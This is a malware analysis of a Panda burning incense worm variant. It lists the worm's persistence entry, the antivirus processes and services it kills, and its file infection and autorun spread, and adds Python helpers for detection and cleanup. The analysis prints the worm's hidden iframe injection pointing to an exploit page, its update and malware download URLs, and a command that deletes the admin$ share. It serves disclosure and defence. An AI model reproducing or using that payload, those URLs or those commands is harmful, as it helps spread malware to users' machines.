Panda burning incense virus nvscv32.exe variant manual removal program (4)


5. Technical analysis

1: When the virus file runs, it copies itself to %SystemRoot%\system32\drivers\nvscv32.exe

and creates a registry auto-start entry:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

nvscv32: "C:\Windows\system32\drivers\nvscv32.exe"
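As an added example (not code from the original analysis), the following Python helper checks Run values for this persistence entry. It normalizes a value the way the registry dump above shows it (surrounding quotes, stray whitespace after the backslash, mixed case), and flags anything that resolves to the dropped file or, more generally, any program auto-started out of system32\drivers. The `winreg` enumeration only does anything on a Windows host; the heuristic about the drivers directory is my assumption, not something the analysis states.

```python
import os
import re

# Indicators taken from the analysis above.
DROPPED_FILE = r"%SystemRoot%\system32\drivers\nvscv32.exe"
RUN_VALUE_NAME = "nvscv32"
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Assumption (not from the analysis): a Run value that starts a program from the
# drivers directory is abnormal; that directory holds .sys files, not autostart .exe files.
UNUSUAL_DIR = "\\system32\\drivers\\"


def normalize_command(value):
    """Reduce a Run value to a comparable lower-case executable path.

    Handles the quoting, stray whitespace ('drivers\\ Nvscv32.exe') and mixed case
    seen in the registry dump, drops command-line arguments after the .exe, and
    expands %SystemRoot%-style variables where the host defines them
    (os.path.expandvars only knows the %VAR% syntax on Windows).
    """
    cmd = value.strip()
    if cmd.startswith('"') and cmd.count('"') >= 2:
        cmd = cmd[1:cmd.index('"', 1)]            # take the quoted path only
    cmd = re.sub(r"\\\s+", "\\\\", cmd)           # 'drivers\ Nvscv32.exe' -> 'drivers\Nvscv32.exe'
    m = re.match(r"(.*?\.exe)\b", cmd, flags=re.IGNORECASE)
    if m:
        cmd = m.group(1)                          # keep only the executable path
    return os.path.expandvars(cmd).lower()


def is_fujacks_persistence(name, value):
    """True if a Run value looks like the worm's auto-start entry."""
    cmd = normalize_command(value)
    if name.strip().lower() == RUN_VALUE_NAME:
        return True
    if cmd.endswith(DROPPED_FILE.split("%")[-1].lower()):   # '\system32\drivers\nvscv32.exe'
        return True
    return UNUSUAL_DIR in cmd


def scan_run_keys():
    """Enumerate HKCU and HKLM Run values on a Windows host; return [(hive, name, value)] hits.

    Returns [] on non-Windows hosts, where the winreg module does not exist.
    """
    try:
        import winreg
    except ImportError:
        return []
    hits = []
    for hive, label in ((winreg.HKEY_CURRENT_USER, "HKCU"), (winreg.HKEY_LOCAL_MACHINE, "HKLM")):
        try:
            key = winreg.OpenKey(hive, RUN_KEY)
        except OSError:
            continue
        with key:
            index = 0
            while True:
                try:
                    vname, vdata, _ = winreg.EnumValue(key, index)
                except OSError:
                    break                         # no more values under this key
                index += 1
                if isinstance(vdata, str) and is_fujacks_persistence(vname, vdata):
                    hits.append((label, vname, vdata))
    return hits


def dropped_file_present():
    """True if the dropped copy exists at the path the analysis gives (meaningful on Windows only)."""
    return os.path.isfile(os.path.expandvars(DROPPED_FILE))


if __name__ == "__main__":
    for hive, vname, vdata in scan_run_keys():
        print(f"[!] {hive}\\...\\Run\\{vname} = {vdata}")
    print("dropped file present:", dropped_file_present())
```

The match on the value name alone is deliberate: a variant can move the file but keep the value name, and a variant can rename the value but keep the path, so both are checked independently.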

2: Search for windows whose titles belong to anti-virus and security tools, and terminate the associated processes:

  • Skynet Firewall
  • VirusScan
  • Symantec AntiVirus
  • System Safety Monitor
  • System Repair Engineer
  • Wrapped Gift Killer
  • Game Trojan Tester
  • Super Patrol

3: Terminate the following processes:

  • mcshield.exe
  • vstskmgr.exe
  • naprdmgr.exe
  • updaterui.exe
  • tbmon.exe
  • scan32.exe
  • ravmond.exe
  • ccenter.exe
  • ravtask.exe
  • rav.exe
  • ravmon.exe
  • ravstub.exe
  • kvxp.kxp
  • kvmonxp.kxp
  • kvcenter.kxp
  • kvsrvxp.exe
  • kregex.exe
  • uihost.exe
  • trojdie.kxp
  • frogagent.exe
  • logo1_.exe
  • logo_1.exe
  • rundl132.exe
  • taskmgr.exe
  • msconfig.exe
  • regedit.exe
  • sreng.exe

4: Disable the following services:

  • schedule
  • sharedAccess
  • rsccenter
  • rsravmon
  • kvwsc
  • kvsrvxp
  • kavsvc
  • avp
  • mcafeeframework
  • mcshield
  • mctaskmanager
  • navapsvc
  • wscsvc
  • kpfwsvc
  • sndsrvc
  • ccproxy
  • ccevtmgr
  • ccsetmgr
  • spbbcsvc
  • symantec core lc
  • npfmntor
  • mskservice
  • firesvc

5: Delete the following registry entries:

  • software\microsoft\windows\currentversion\run\ravtask
  • software\microsoft\windows\currentversion\run\kvmonxp
  • software\microsoft\windows\currentversion\run\kav
  • software\microsoft\windows\currentversion\run\kavpersonal50
  • software\microsoft\windows\currentversion\run\mcafeeupdaterui
  • software\microsoft\windows\currentversion\run\network associates error reporting service
  • software\microsoft\windows\currentversion\run\shstatexe
  • software\microsoft\windows\currentversion\run\ylive.exe
  • software\microsoft\windows\currentversion\run\yassistse

6: Infect all executable files and replace their icon (in this variant the replacement is not the panda burning incense icon).

7: Skip the following directories:

  • windows
  • winnt
  • systemvolumeinformation
  • recycled
  • windowsnt
  • windowsupdate
  • windowsmediaplayer
  • outlookexpress
  • netmeeting
  • commonfiles
  • complusapplications
  • messenger
  • installshieldinstallationinformation
  • msn
  • microsoftfrontpage
  • moviemaker
  • msngaminzone

8: Delete *.gho backup files.

9: Copy itself as setup.exe to the root directory of every drive, create an autorun.inf file so the copy runs automatically, and set the file attributes to hidden, read-only and system.

autorun.inf content:

  [AutoRun]
  OPEN=setup.exe
  shellexecute=setup.exe
  shell\Auto\command=setup.exe
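The autorun.inf above is what a responder has to recognise on every drive root, so here is an added Python example (my code, not part of the original analysis) that parses such a file, lists the programs it would launch through open=, shellexecute= and shell\<verb>\command=, flags the worm's pattern of a root-level executable, and reports the files to remove from a drive root. The sample content is the one reported above; the root-executable heuristic and the parser are my assumptions about what to treat as suspicious.

```python
import os
import re

# autorun.inf content reported in the analysis (reconstructed here as a test sample).
SAMPLE_AUTORUN = "[AutoRun]\nOPEN=setup.exe\nshellexecute=setup.exe\nshell\\Auto\\command=setup.exe\n"

# Keys under [AutoRun] that start a program: directly (open, shellexecute) or via a
# context-menu verb (shell\<verb>\command) that Windows also offers as the default action.
LAUNCH_KEYS = ("open", "shellexecute")
SHELL_COMMAND_RE = re.compile(r"^shell\\[^\\]+\\command$", re.IGNORECASE)


def parse_autorun(text):
    """Return the [AutoRun] section as {lower-case key: value}.

    Hand-rolled rather than configparser because malware writes keys such as
    'shell\\Auto\\command' and mixed case ('OPEN') that configparser would mangle.
    """
    entries = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        entries[key.strip().lower()] = value.strip()
    return entries


def launched_programs(text):
    """Programs the file would run, from open=, shellexecute= and shell\\<verb>\\command=."""
    return [v for k, v in parse_autorun(text).items() if k in LAUNCH_KEYS or SHELL_COMMAND_RE.match(k)]


def is_root_executable_autorun(text):
    """True if the file launches an executable sitting directly in the drive root.

    Assumption: on a fixed disk this is the worm's pattern; files that only set
    icon= or label= are benign.
    """
    return any(p.lower().endswith(".exe") and "\\" not in p and "/" not in p
               for p in launched_programs(text))


def check_drive_root(root):
    """Inspect one drive root (e.g. 'D:\\\\') and return the files a responder should remove.

    The hidden, system and read-only attributes the worm sets do not block reading.
    """
    inf = os.path.join(root, "autorun.inf")
    findings = []
    if not os.path.isfile(inf):
        return findings
    with open(inf, "r", encoding="ascii", errors="replace") as fh:
        text = fh.read()
    if is_root_executable_autorun(text):
        findings.append(inf)
        for prog in set(launched_programs(text)):
            path = os.path.join(root, prog)
            if os.path.isfile(path):
                findings.append(path)
    return findings


if __name__ == "__main__":
    # On Windows, check every drive letter that exists; elsewhere just exercise the parser.
    roots = [f"{c}:\\" for c in "ABCDEFGHIJKLMNOPQRSTUVWXYZ" if os.path.exists(f"{c}:\\")]
    for r in roots:
        for f in check_drive_root(r):
            print("[!] remove:", f)
    print("sample launches:", launched_programs(SAMPLE_AUTORUN))
```

Before deleting the reported files on Windows, clear the attributes the worm set (attrib -h -r -s on each file); otherwise the read-only flag makes the delete fail.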

10: Remove the administrative share: cmd.exe /c net share admin$ /del /y

11: Append <iframe src=http://www.krvkr.com/worm.htm width="0" height="0"></iframe> to every script file on the machine. That address is a web trojan page that exploits the MS06-014 vulnerability: when a user browses a page on the infected server from an unpatched system, this virus is downloaded and executed.
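For step 11 a defender needs to find and strip the injected tag from web files without touching legitimate frames. The following Python is an added example, not part of the original analysis: it parses each <iframe> tag's attributes, treats a frame whose width and height are both 0 as hidden (how the worm loads the exploit page invisibly), and removes those while leaving visible frames alone. The sample page is constructed around the reported tag, and the file-extension list is my assumption about what "script files" covers.

```python
import os
import re

# Injected tag as reported in the analysis, embedded in a constructed sample page.
SAMPLE_HTML = (
    "<html><body><p>Welcome</p>\n"
    '<iframe src=http://www.krvkr.com/worm.htm width="0" height="0"></iframe>\n'
    '<iframe src="https://player.example/clip" width="640" height="360"></iframe>\n'
    "</body></html>\n"
)

# Assumption: extensions covering the "script files" the worm modifies.
WEB_EXTENSIONS = (".htm", ".html", ".asp", ".aspx", ".php", ".jsp")

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>.*?</iframe\s*>", re.IGNORECASE | re.DOTALL)
# name=value with double quotes, single quotes or no quotes (the injected tag leaves src unquoted).
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def iframe_attrs(attr_text):
    """Attributes of one tag as {lower-case name: value}."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return attrs


def is_hidden(attrs):
    """A 0x0 frame is invisible to the user but still loads its src."""
    zero = ("0", "0px")
    return (attrs.get("width", "").strip().lower() in zero
            and attrs.get("height", "").strip().lower() in zero)


def strip_hidden_iframes(text):
    """Return (cleaned text, list of src URLs removed)."""
    removed = []

    def repl(m):
        attrs = iframe_attrs(m.group(1))
        if is_hidden(attrs):
            removed.append(attrs.get("src", ""))
            return ""
        return m.group(0)                        # visible frame: keep as-is

    return IFRAME_RE.sub(repl, text), removed


def find_hidden_iframes(text):
    """Only the src URLs of hidden frames, for reporting and IoC collection."""
    return strip_hidden_iframes(text)[1]


def clean_tree(top, dry_run=True):
    """Walk a web root; report (and unless dry_run, rewrite) files carrying hidden frames.

    latin-1 round-trips arbitrary bytes, so a GBK-encoded page is written back
    unchanged apart from the removed ASCII tag.
    """
    report = {}
    for dirpath, _, files in os.walk(top):
        for name in files:
            if not name.lower().endswith(WEB_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="latin-1") as fh:
                original = fh.read()
            cleaned, removed = strip_hidden_iframes(original)
            if removed:
                report[path] = removed
                if not dry_run:
                    with open(path, "w", encoding="latin-1") as fh:
                        fh.write(cleaned)
    return report


if __name__ == "__main__":
    print("hidden frames in sample:", find_hidden_iframes(SAMPLE_HTML))
```

Run clean_tree with dry_run=True first and review the reported URLs; a legitimate tracking pixel can also be a 0x0 frame, so the list is a triage output rather than a verdict.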

12: Scan machines on the LAN and spread to any found to be vulnerable.

13: Fetch http://www.whboy.net/update/wormcn.txt in the background and download further malware according to that download list.

The current download list is as follows (all of these links are dangerous; do not open them):

  • http://www.krvkr.com/down/cq.exe
  • http://www.krvkr.com/down/mh.exe
  • http://www.krvkr.com/down/my.exe
  • http://www.krvkr.com/down/wl.exe
  • http://www.krvkr.com/down/rx.exe
  • http://www.krvkr.com/down/Wow.exe
  • http://www.krvkr.com/down/zt.exe
  • http://www.krvkr.com/down/wm.exe
  • http://www.krvkr.com/down/dj.exe
  • http://www.krvkr.com/cn/IEchajian.exe

This completes the analysis of the virus's behaviour.

Copyright © Windows knowledge All Rights Reserved